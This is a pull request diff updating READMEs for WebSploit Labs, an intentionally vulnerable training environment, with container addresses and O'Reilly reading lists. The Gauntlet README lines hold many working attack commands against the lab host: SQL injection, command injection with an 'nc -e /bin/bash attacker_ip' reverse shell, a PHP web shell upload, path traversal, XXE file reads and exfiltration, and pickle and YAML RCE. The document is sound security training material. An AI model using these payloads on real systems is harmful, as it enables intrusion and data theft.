### PR TITLE
docs: update lab READMEs with container info and references

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -12,3 +12,6 @@ __pycache__
 websploit.db
 uploads
 backups
+
+# Cursor
+.cursor/

--- a/README.md
+++ b/README.md
@@ -27,10 +27,12 @@ Download and install **Kali Linux** or **Parrot OS** (whichever you prefer) in a
 ---
 
 ### Step 2: Install WebSploit Labs
-Once your Kali or Parrot VM is ready, open a terminal and run the following command to set up WebSploit Labs:
+Once your Kali or Parrot VM is ready, open a terminal and run the following commands to clone the repository and set up WebSploit Labs:
 
 ```bash
-curl -sSL https://websploit.org/install.sh | sudo bash
+git clone https://github.com/The-Art-of-Hacking/websploit.git
+cd websploit
+sudo bash install.sh
 ```
 
 This script will:

--- a/additional-labs/Command_Injection/README.md
+++ b/additional-labs/Command_Injection/README.md
@@ -1,5 +1,8 @@
 # Command Injection Lab
 
+**Lab Name:** `shell-inject`
+**Vulnerability:** OS Command Injection
+
 This lab demonstrates an OS Command Injection vulnerability in a web application.
 
 ## Scenario
@@ -11,20 +14,7 @@ Exploit the command injection vulnerability to execute arbitrary commands on the
 ## Instructions
 
 1. **Access the Lab**: 
-   - URL: `http://localhost:5002`
-   
-2. **Analyze functionality**:
-   - Enter an IP address (e.g., `127.0.0.1`) and click "Ping".
-   - Observe the output.
-
-3. **Identify Vulnerability**:
-   - Try appending shell operators to your input. Common operators include `;`, `&&`, `|`.
-   - Example: `127.0.0.1; whoami`
-
-4. **Challenge**:
-   - List the files in the current directory (`ls -la`).
-   - Find the current user ID (`id`).
-   - Read the `/etc/passwd` file.
+   - This is running on the `shell-inject` container on the `10.6.6.34` IP address. Access the lab at `http://10.6.6.34:5002`
 
 ## Explanation
 The application constructs a shell command like this:
@@ -33,4 +23,42 @@ command = f"ping -c 3 {target}"
 subprocess.run(command, shell=True, ...)
 ```
 Because `shell=True` is used and `target` is not sanitized, an attacker can terminate the `ping` command and start a new one.
+
+## References
+For more information on command injection vulnerabilities and secure coding practices, check out these resources:
+
+## Live Training
+**Upcoming Live Cybersecurity and AI Training in O'Reilly:** [Register before it is too late](https://learning.oreilly.com/search/?q=omar%20santos&type=live-course&rows=100&language_with_transcripts=en) (free with O'Reilly Subscription)
+
+## Reading List
+
+- **Redefining Hacking**
+A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World**  
+  Explore strategies for creating robust cybersecurity frameworks in an AI-centric environment. [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics**  
+  Gain insights into the ethical and security challenges posed by AI technologies. [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+
+## Video Courses
+
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+
+- **Defending and Deploying AI (video)**  This course provides a comprehensive, hands-on journey into modern AI applications for technology and security professionals, covering AI-enabled programming, networking, and cybersecurity to help learners master AI tools for dynamic information retrieval, automation, and operational efficiency. [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+
+- **AI-Enabled Programming, Networking, and Cybersecurity**
+Learn to use AI for cybersecurity, networking, and programming tasks. [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+
+- **Securing Generative AI**
+Explore security for deploying and developing AI applications, RAG, agents, and other AI implementations. [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+
+- **Certified Ethical Hacker (CEH), Latest Edition** [Available on O'Reilly](https://learning.oreilly.com/course/certified-ethical-hacker/9780135395646/)
+
+## Additional Resources
+
+- **Hacking Scenarios (Labs) in O'Reilly**: [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository**: [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs**: [Visit WebSploit Labs](https://websploit.org)
+
 

--- a/additional-labs/GraphQL/README.md
+++ b/additional-labs/GraphQL/README.md
@@ -13,7 +13,8 @@ This lab simulates a futuristic communications hub that exposes a GraphQL API. T
 - Learn how to use GraphiQL to interact with the API.
 
 ## Installation
-This lab is part of the WebSploit Labs framework.
+This lab is part of the WebSploit Labs framework and it is running on the `graphql-galaxy` container on the `10.6.6.44` IP address.
+
 To run it individually:
 ```bash
 docker build -t graphql-galaxy .
@@ -26,3 +27,23 @@ docker run -p 5023:5023 graphql-galaxy
 3.  **Exploitation:** Query the `user` field with the ID of the administrator (`1`) and request the `api_token`.
 4.  **Flag:** The flag is the value of the administrator's `api_token`.
 
+## References
+For more information on GraphQL security vulnerabilities and secure coding practices, check out these resources:
+
+- **Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics** - [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+- **The AI Revolution in Networking, Cybersecurity, and Emerging Technologies** - [Available on O'Reilly](https://learning.oreilly.com/library/view/the-ai-revolution/9780138293703)
+
+## Additional References
+
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+- **Build Your Own AI Lab (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/build-your-own/9780135439616)
+- **Defending and Deploying AI (video)** - [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+- **AI-Enabled Programming, Networking, and Cybersecurity** - [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+- **Securing Generative AI** - [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+- **The Art of Hacking** - [Visit The Art of Hacking](https://theartofhacking.org)
+- **Hacking Scenarios (Labs) in O'Reilly** - [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository** - [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs** - [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)

--- a/additional-labs/Multi-Vulnerability-Gauntlet/README.md
+++ b/additional-labs/Multi-Vulnerability-Gauntlet/README.md
@@ -1,5 +1,7 @@
 # WebSploit Labs Gauntlet: A Multi-Vulnerability Challenge
-*Created by Omar Santos for WebSploit Labs - Cybersecurity Education*
+
+**Lab Name:** `hydra-nexus`
+**Vulnerability:** Multiple Vulnerabilities
 
 [WebSploit Labs](https://websploit.org/) is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking, Bug Hunting, Incident Response, Digital Forensics, and Threat Hunting training sessions. WebSploit Labs includes several intentionally vulnerable applications running in Docker containers on top of Kali Linux or Parrot Security OS, several additional tools, and over 9,000 cybersecurity resources.
 
@@ -7,7 +9,10 @@
 
 WebSploit comes with a set of intentionally vulnerable applications running in Docker containers on top of Kali Linux or Parrot Security OS, several additional tools, and over 9,000 cybersecurity resources. Those containers were created in x86_64 architecture and can be run in any x86_64 Linux system. However, if you are using a macOS in Apple Silicon, you can complete this lab without the need of running the containers.
 
-## 🎯 Learning Objectives
+This lab is part of the WebSploit Labs framework and it is running on the `hydra-nexus` container on the `10.6.6.30` IP address.
+Access the lab at `http://10.6.6.30:5010`.
+
+## Learning Objectives
 By completing this comprehensive lab, students will learn to:
 - Identify and exploit multiple types of web vulnerabilities
 - Understand the interconnected nature of security flaws
@@ -15,43 +20,21 @@ By completing this comprehensive lab, students will learn to:
 - Develop comprehensive penetration testing methodologies
 - Learn effective remediation strategies for various vulnerability types
 
-## 📋 Prerequisites
+## Prerequisites
 - Understanding of HTTP protocol and web applications
 - Basic knowledge of SQL, XML, and command line interfaces
 - Familiarity with web security concepts
 - Burp Suite or similar web testing tools
 - Python knowledge for exploitation scripts
 
-## 🚀 Lab Setup
+## Lab Setup
 
-### Running the Application
-```bash
-# Install dependencies
-pip install flask sqlite3 pyjwt pyyaml
-
-# Save the application as multi_vuln_app.py
-python3 multi_vuln_app.py
-```
+This lab is part of the WebSploit Labs framework and it is running on the `hydra-nexus` container on the `10.6.6.30` IP address.
+Access the lab at `http://10.6.6.30:5010`.
 
 ### Docker Setup (Recommended)
-```dockerfile
-FROM python:3.9-slim
 
-WORKDIR /app
-COPY multi_vuln_app.py .
-RUN pip install flask pyjwt pyyaml
-
-EXPOSE 5010
-CMD ["python", "multi_vuln_app.py"]
-```
-
-```bash
-# Build and run
-docker build -t websploit-multi-vuln .
-docker run -p 5010:5010 websploit-multi-vuln
-```
-
-## 🔍 Vulnerability Overview
+## Vulnerability Overview
 
 This application contains **17 different vulnerability types** across multiple categories:
 
@@ -95,19 +78,19 @@ This application contains **17 different vulnerability types** across multiple c
 - Workflow bypass
 - Input validation bypass
 
-## 🧪 Testing Methodology
+## Testing Methodology
 
 ### Phase 1: Reconnaissance and Application Mapping
 
 #### 1.1 Application Structure Analysis
 ```bash
 # Map all endpoints
-curl -X GET http://localhost:5010/
-curl -X GET http://localhost:5010/login
-curl -X GET http://localhost:5010/shop
-curl -X GET http://localhost:5010/tools
-curl -X GET http://localhost:5010/upload
-curl -X GET http://localhost:5010/admin
+curl -X GET http://10.6.6.30:5010/
+curl -X GET http://10.6.6.30:5010/login
+curl -X GET http://10.6.6.30:5010/shop
+curl -X GET http://10.6.6.30:5010/tools
+curl -X GET http://10.6.6.30:5010/upload
+curl -X GET http://10.6.6.30:5010/admin
 ```
 
 #### 1.2 Technology Stack Identification
@@ -123,15 +106,15 @@ curl -X GET http://localhost:5010/admin
 
 ```bash
 # Basic SQL injection - authentication bypass
-curl -X POST http://localhost:5010/login \
+curl -X POST http://10.6.6.30:5010/login \
   -d "username=admin' OR '1'='1-- &password=anything"
 
 # Union-based SQL injection
-curl -X POST http://localhost:5010/login \
+curl -X POST http://10.6.6.30:5010/login \
   -d "username=admin' UNION SELECT 1,2,3,4,5-- &password=test"
 
 # Error-based SQL injection
-curl -X POST http://localhost:5010/login \
+curl -X POST http://10.6.6.30:5010/login \
   -d "username=admin' AND (SELECT * FROM users)-- &password=test"
 ```
 
@@ -140,26 +123,26 @@ curl -X POST http://localhost:5010/login \
 
 ```bash
 # Extract user data
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' UNION SELECT username,password,email,role FROM users-- "
 
 # Extract table structure
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' UNION SELECT name,sql,'','','' FROM sqlite_master WHERE type='table'-- "
 
 # Extract all user passwords
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' UNION SELECT username,password,'','','' FROM users-- "
 ```
 
 #### 2.3 Boolean-based Blind SQL Injection
 ```bash
 # Test for admin user
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' AND (SELECT COUNT(*) FROM users WHERE username='admin')=1-- "
 
 # Extract password character by character
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' AND (SELECT SUBSTR(password,1,1) FROM users WHERE username='admin')='a'-- "
 ```
 
@@ -170,15 +153,15 @@ curl -G http://localhost:5010/shop \
 
 ```bash
 # Basic command injection
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=127.0.0.1; whoami&count=1"
 
 # Command chaining
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=127.0.0.1 && cat /etc/passwd&count=1"
 
 # Command substitution
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=\$(whoami)&count=1"
 ```
 
@@ -187,22 +170,22 @@ curl -X POST http://localhost:5010/tools/ping \
 
 ```bash
 # Inject commands via domain parameter
-curl -X POST http://localhost:5010/tools/lookup \
+curl -X POST http://10.6.6.30:5010/tools/lookup \
   -d "domain=google.com; ls -la&type=A"
 
 # Multiple command execution
-curl -X POST http://localhost:5010/tools/lookup \
+curl -X POST http://10.6.6.30:5010/tools/lookup \
   -d "domain=test.com && id && uname -a&type=A"
 ```
 
 #### 3.3 Advanced Command Injection
 ```bash
 # Reverse shell attempt (for educational purposes)
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=127.0.0.1; nc -e /bin/bash attacker_ip 4444&count=1"
 
 # File system exploration
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=127.0.0.1; find / -name '*.conf' 2>/dev/null&count=1"
 ```
 
@@ -214,29 +197,29 @@ curl -X POST http://localhost:5010/tools/ping \
 ```bash
 # Upload PHP web shell
 echo '<?php system($_GET["cmd"]); ?>' > shell.php
-curl -X POST http://localhost:5010/upload \
+curl -X POST http://10.6.6.30:5010/upload \
   -F "file=@shell.php"
 
 # Upload Python script
 echo 'import os; os.system("whoami")' > script.py
-curl -X POST http://localhost:5010/upload \
+curl -X POST http://10.6.6.30:5010/upload \
   -F "file=@script.py"
 
 # Upload with double extension
 echo 'malicious content' > file.php.txt
-curl -X POST http://localhost:5010/upload \
+curl -X POST http://10.6.6.30:5010/upload \
   -F "file=@file.php.txt"
 ```
 
 #### 4.2 Path Traversal Testing
 ```bash
 # Access uploaded files
-curl http://localhost:5010/uploads/shell.php
+curl http://10.6.6.30:5010/uploads/shell.php
 
 # Path traversal attempts
-curl http://localhost:5010/uploads/../app.py
-curl http://localhost:5010/uploads/../../etc/passwd
-curl http://localhost:5010/uploads/%2e%2e%2f%2e%2e%2fetc%2fpasswd
+curl http://10.6.6.30:5010/uploads/../app.py
+curl http://10.6.6.30:5010/uploads/../../etc/passwd
+curl http://10.6.6.30:5010/uploads/%2e%2e%2f%2e%2e%2fetc%2fpasswd
 ```
 
 ### Phase 5: IDOR (Insecure Direct Object Reference) Testing
@@ -248,7 +231,7 @@ curl http://localhost:5010/uploads/%2e%2e%2f%2e%2e%2fetc%2fpasswd
 # Access different order IDs
 for i in {1..10}; do
   echo "Testing order ID: $i"
-  curl -s http://localhost:5010/order/$i | grep -E "(Order|User ID|Total)"
+  curl -s http://10.6.6.30:5010/order/$i | grep -E "(Order|User ID|Total)"
 done
 ```
 
@@ -259,11 +242,11 @@ done
 # Extract user information
 for i in {1..5}; do
   echo "User ID $i:"
-  curl -s http://localhost:5010/api/users/$i | jq .
+  curl -s http://10.6.6.30:5010/api/users/$i | jq .
 done
 
 # Look for sensitive information
-curl http://localhost:5010/api/users/1 | jq '.password_hash, .api_key'
+curl http://10.6.6.30:5010/api/users/1 | jq '.password_hash, .api_key'
 ```
 
 #### 5.3 Admin Panel IDOR
@@ -271,12 +254,12 @@ curl http://localhost:5010/api/users/1 | jq '.password_hash, .api_key'
 
 ```bash
 # Access different user profiles in admin panel
-curl "http://localhost:5010/admin?user_id=1"
-curl "http://localhost:5010/admin?user_id=2"
-curl "http://localhost:5010/admin?user_id=999"
+curl "http://10.6.6.30:5010/admin?user_id=1"
+curl "http://10.6.6.30:5010/admin?user_id=2"
+curl "http://10.6.6.30:5010/admin?user_id=999"
 
 # SQL injection in admin panel
-curl "http://localhost:5010/admin?user_id=1' UNION SELECT 1,username,password,email,role FROM users-- "
+curl "http://10.6.6.30:5010/admin?user_id=1' UNION SELECT 1,username,password,email,role FROM users-- "
 ```
 
 ### Phase 6: XXE (XML External Entity) Testing
@@ -286,14 +269,14 @@ curl "http://localhost:5010/admin?user_id=1' UNION SELECT 1,username,password,em
 
 ```bash
 # Basic XXE payload
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 <user><name>&xxe;</name></user>'
 
 # Windows file disclosure
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts"> ]>
@@ -303,14 +286,14 @@ curl -X POST http://localhost:5010/api/xml \
 #### 6.2 XXE for Internal Network Scanning
 ```bash
 # Port scanning via XXE
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:22"> ]>
 <user><name>&xxe;</name></user>'
 
 # Internal service discovery
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
@@ -320,7 +303,7 @@ curl -X POST http://localhost:5010/api/xml \
 #### 6.3 XXE Data Exfiltration
 ```bash
 # Exfiltrate data to external server
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/passwd">
@@ -351,7 +334,7 @@ print(f"Malicious payload: {payload}")
 
 ```bash
 # Execute RCE payload
-curl -X POST http://localhost:5010/api/data \
+curl -X POST http://10.6.6.30:5010/api/data \
   -d "data=gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjChlY2hvICJSQ0Ugc3VjY2Vzc2Z1bCB2aWEgcGlja2xlIiA+IC90bXAvcmNlX3Rlc3QudHh0lIWUUpQu"
 
 # Advanced RCE with reverse shell
@@ -369,12 +352,12 @@ print(base64.b64encode(pickle.dumps(RCE())).decode())
 
 ```bash
 # Basic YAML RCE payload
-curl -X POST http://localhost:5010/api/config \
+curl -X POST http://10.6.6.30:5010/api/config \
   -H "Content-Type: text/plain" \
   -d "!!python/object/apply:os.system ['echo YAML_RCE > /tmp/yaml_test.txt']"
 
 # Complex YAML payload
-curl -X POST http://localhost:5010/api/config \
+curl -X POST http://10.6.6.30:5010/api/config \
   -H "Content-Type: text/plain" \
   -d "!!python/object/apply:subprocess.check_output [['whoami']]"
 ```
@@ -386,7 +369,7 @@ curl -X POST http://localhost:5010/api/config \
 
 ```bash
 # Obtain JWT token
-TOKEN=$(curl -X POST http://localhost:5010/api/auth \
+TOKEN=$(curl -X POST http://10.6.6.30:5010/api/auth \
   -H "Content-Type: application/json" \
   -d '{"username":"admin","password":"admin123"}' | jq -r '.token')
 
@@ -422,7 +405,7 @@ print(f'Unsigned token: {unsigned_token}')
 "
 
 # Test with manipulated token
-curl -X GET http://localhost:5010/api/protected \
+curl -X GET http://10.6.6.30:5010/api/protected \
   -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ."
 ```
 
@@ -462,22 +445,22 @@ secret = bruteforce_jwt_secret(token)
 
 ```bash
 # Normal purchase
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": 1, "price": 999.99}'
 
 # Price manipulation - negative price
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": 1, "price": -999.99}'
 
 # Price manipulation - zero price
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": 1, "price": 0.01}'
 
 # Quantity manipulation
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": -1, "price": 999.99}'
 ```
@@ -485,12 +468,12 @@ curl -X POST http://localhost:5010/api/purchase \
 #### 9.2 Workflow Bypass Testing
 ```bash
 # Integer overflow attempt
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": 999999999999999999, "price": 0.00001}'
 
 # Parameter pollution
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -d "product_id=1&quantity=1&price=999.99&price=0.01"
 ```
 
@@ -501,65 +484,65 @@ curl -X POST http://localhost:5010/api/purchase \
 
 ```bash
 # Analyze session information
-curl -X GET http://localhost:5010/session/data \
+curl -X GET http://10.6.6.30:5010/session/data \
   -H "Cookie: session=test_session_id" | jq .
 
 # Session fixation testing
-curl -X GET http://localhost:5010/session/data \
+curl -X GET http://10.6.6.30:5010/session/data \
   -H "Cookie: session=attacker_controlled_session"
 ```
 
-## 🔗 Vulnerability Chaining Scenarios
+## Vulnerability Chaining Scenarios
 
 ### Scenario 1: Complete Application Compromise
 ```bash
 # Step 1: SQL injection to extract user credentials
-curl -G http://localhost:5010/shop \
+curl -G http://10.6.6.30:5010/shop \
   --data-urlencode "search=' UNION SELECT username,password,email,role,api_key FROM users-- "
 
 # Step 2: Use extracted admin credentials
-curl -X POST http://localhost:5010/login \
+curl -X POST http://10.6.6.30:5010/login \
   -d "username=admin&password=admin123"
 
 # Step 3: Upload web shell via file upload
 echo '<?php system($_GET["cmd"]); ?>' > shell.php
-curl -X POST http://localhost:5010/upload -F "file=@shell.php"
+curl -X POST http://10.6.6.30:5010/upload -F "file=@shell.php"
 
 # Step 4: Execute commands via uploaded shell
-curl "http://localhost:5010/uploads/shell.php?cmd=whoami"
+curl "http://10.6.6.30:5010/uploads/shell.php?cmd=whoami"
 ```
 
 ### Scenario 2: Data Exfiltration Chain
 ```bash
 # Step 1: XXE to discover internal files
-curl -X POST http://localhost:5010/api/xml \
+curl -X POST http://10.6.6.30:5010/api/xml \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><user><n>&xxe;</n></user>'
 
 # Step 2: Command injection to access discovered files
-curl -X POST http://localhost:5010/tools/ping \
+curl -X POST http://10.6.6.30:5010/tools/ping \
   -d "host=127.0.0.1; cat /etc/passwd&count=1"
 
 # Step 3: Use IDOR to access user database
-curl http://localhost:5010/api/users/1 | jq '.password_hash'
+curl http://10.6.6.30:5010/api/users/1 | jq '.password_hash'
 ```
 
 ### Scenario 3: Privilege Escalation Chain
 ```bash
 # Step 1: Business logic flaw to create free orders
-curl -X POST http://localhost:5010/api/purchase \
+curl -X POST http://10.6.6.30:5010/api/purchase \
   -H "Content-Type: application/json" \
   -d '{"product_id": "1", "quantity": 1, "price": 0}'
 
 # Step 2: IDOR to access admin functions
-curl "http://localhost:5010/admin?user_id=1"
+curl "http://10.6.6.30:5010/admin?user_id=1"
 
 # Step 3: Deserialization RCE for full system control
-curl -X POST http://localhost:5010/api/data \
+curl -X POST http://10.6.6.30:5010/api/data \
   -d "data=[base64_rce_payload]"
 ```
 
-## 🛠️ Automated Testing Scripts
+## Automated Testing Scripts
 
 ### Vulnerability Scanner Script
 ```python
@@ -713,7 +696,7 @@ class WebSploitScanner:
         print("\n[!] This is an educational environment with intentional vulnerabilities")
 
 if __name__ == "__main__":
-    scanner = WebSploitScanner("http://localhost:5010")
+    scanner = WebSploitScanner("http://10.6.6.30:5010")
     scanner.generate_report()
 ```
 
@@ -775,7 +758,7 @@ def get_row_count(url, injection_point, table, where_clause):
     return 0
 
 # Usage example
-url = "http://localhost:5010/shop"
+url = "http://10.6.6.30:5010/shop"
 usernames = extract_data_blind_sqli(url, "search", "users", "username")
 passwords = extract_data_blind_sqli(url, "search", "users", "password")
 
@@ -1055,13 +1038,23 @@ Upload a web shell hidden in an image file using steganographic techniques.
 #### Challenge 5: Multi-stage Attack
 Plan and execute a realistic APT-style attack using multiple vulnerabilities.
 
+## 📚 References
+For more information on the vulnerabilities and secure coding practices used in this lab, check out these resources:
+
+- **Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World** - [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics** - [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+- **The AI Revolution in Networking, Cybersecurity, and Emerging Technologies** - [Available on O'Reilly](https://learning.oreilly.com/library/view/the-ai-revolution/9780138293703)
+
 ## 📚 Additional Resources
 
-- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
-- [OWASP Top 10 Web Application Security Risks](https://owasp.org/Top10/)
-- [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
-- [OWASP Generative AI Top 10](https://genai.owasp.org/)
-- [OWASP AI Red Teaming & Evaluation](https://genai.owasp.org/initiatives/#ai-redteaming)
-- [NIST Cybersecurity Framework](https://www.nist.gov/cybersecurity-framework)
-- [PortSwigger Web Security Academy](https://portswigger.net/web-security-academy)
-
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+- **Build Your Own AI Lab (video)** - [Available on O'Reilly](https://learning.oreilly.com/course/build-your-own/9780135439616)
+- **Defending and Deploying AI (video)** - [Available on O'Reilly](https://www.oreilly.com/videos/defending-and-deploying/9780135463727/)
+- **AI-Enabled Programming, Networking, and Cybersecurity** - [Available on O'Reilly](https://learning.oreilly.com/course/ai-enabled-programming-networking/9780135402696/)
+- **Securing Generative AI** - [Available on O'Reilly](https://learning.oreilly.com/course/securing-generative-ai/9780135401804/)
+- **The Art of Hacking** - [Visit The Art of Hacking](https://theartofhacking.org)
+- **Hacking Scenarios (Labs) in O'Reilly** - [https://hackingscenarios.com](https://hackingscenarios.com)
+- **GitHub Repository** - [Visit GitHub Repo](https://hackerrepo.org)
+- **WebSploit Labs** - [Visit WebSploit Labs](https://websploit.org)
+- **NetAcad Ethical Hacker Free Course** - [Available (free) on NetAcad Skills for All](https://www.netacad.com/courses/ethical-hacker?courseLang=en-US)

--- a/additional-labs/Path_Traversal/README.md
+++ b/additional-labs/Path_Traversal/README.md
@@ -1,5 +1,7 @@
 # Path Traversal Lab
 
+**Lab Name:** `maze-walker`
+**Vulnerability:** Path Traversal
 This lab demonstrates a Path Traversal (also known as Directory Traversal) vulnerability.
 
 ## Scenario
@@ -11,7 +13,7 @@ Exploit the path traversal vulnerability to access files outside the intended di
 ## Instructions
 
 1. **Access the Lab**:
-   - URL: `http://localhost:5003`
+   - This is running on the `maze-walker` container on the `10.6.6.35` IP address. Access the lab at `http://10.6.6.35:5003`
 
 2. **Analyze functionality**:
    - Click on the links for `hello.txt` or `notes.txt`.
@@ -29,3 +31,48 @@ Exploit the path traversal vulnerability to access files outside the intended di
 ## Explanation
 The application fails to validate that the resolved path is still within the intended directory. By providing `../`, an attacker can traverse out of the `files/` folder and access any file the application process has read permissions for.
 
+## References
+For more information on path traversal vulnerabilities and secure coding practices, check out these resources:
+
+## Live Training
+**Upcoming Live Cybersecurity and AI Training in O'Reilly:** [Register before it is too late](https://learning.oreilly.com/search/?q=omar%20santos&type=live-course&rows=100&language_with_transcripts=en) (free with O'Reilly Subscription)
+
+## Reading List
+
+- **Redefining Hacking**
+A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-driven World [Available on O'Reilly](https://learning.oreilly.com/library/view/redefining-hacking-a/9780138363635/)
+
+- **Developing Cybersecurity Programs and Policies in an AI-Driven World**  
+  Explore strategies for creating robust cybersecurity frameworks in an AI-centric environment. [Available on O'Reilly](https://learning.oreilly.com/library/view/developing-cybersecurity-programs/9780138073992)
+
+- **Beyond the Algorithm: AI, Security, Privacy, and Ethics**  
+  Gain insights into the ethical and security challenges posed by AI technologies. [Available on O'Reilly](https://learning.oreilly.com/library/view/beyond-the-algorithm/9780138268442)
+
+- **The AI Revolution in Networking, Cybersecurity, and Emerging Technologies** Understand how AI is transforming networking and cybersecurity landscapes.  
+[Available on O'Reilly](https://learning.oreilly.com/library/view/the-ai-revolution/9780138293703)
+
+## Video Courses  
+
+- **Building the Ultimate Cybersecurity Lab and Cyber Range (video)** [Available on O'Reilly](https://learning.oreilly.com/course/building-the-ultimate/9780138319090/)
+
